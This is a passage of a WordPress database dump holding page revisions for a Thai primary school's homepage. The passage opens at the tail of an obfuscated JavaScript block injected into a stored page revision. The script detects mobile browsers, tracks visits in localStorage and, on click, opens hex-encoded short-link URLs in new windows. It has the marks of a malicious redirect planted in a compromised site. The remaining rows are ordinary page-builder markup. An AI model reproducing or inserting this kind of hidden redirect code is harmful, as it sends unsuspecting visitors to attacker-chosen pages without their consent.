_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:07:27','2024-07-27 04:07:27','',14,'http://pakhaeng.ssk.in.th/?p=78',0,'revision','',0),
(80,1,'2024-07-27 11:08:59','2024-07-27 04:08:59','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":180},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca 